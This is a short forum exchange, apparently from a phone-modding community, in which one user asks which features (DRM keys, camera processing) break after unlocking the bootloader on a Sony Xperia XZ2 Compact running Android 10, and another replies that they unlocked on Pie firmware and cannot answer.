Thanks for verifying that it wasn't something I'm not doing correctly! Just out of curiosity, I'm assuming that your XZ2C was on Android 10 and you had to unlock the BL to get it working again? Would you be able to provide a list of things that are now broken due to the unlock and loss of DRM keys so that folks like myself might be able to weigh whether or not we want to unlock? I'd really like to know exactly what I'm giving up, at least today on Android 10 for an unlocked BL so I can weigh the pros and cons. I'm not sure if you're familiar enough with the XZ2C and know what all features it had before and what's gone missing/broken after.
I can read lots about what's been broken and not on past versions of Android, but I'm not finding a lot of info yet on what's changed in Android 10, if anything. I have read that BL unlock on Android 10 doesn't break the camera anymore but it's unclear to me if reports are that the camera is no longer completely broken (green screen) but any Sony processing perks are gone, or if the camera and all the Sony stuff related to the camera and image processing are no longer affected.
Thanks!
@Mike7143, my xz2 unlock has been done on 52.0.A.8.131, that is a pie firmware. That time (2019-10-03) android Q had not been available for xz2 yet.
So I cannot help you with those questions, sorry.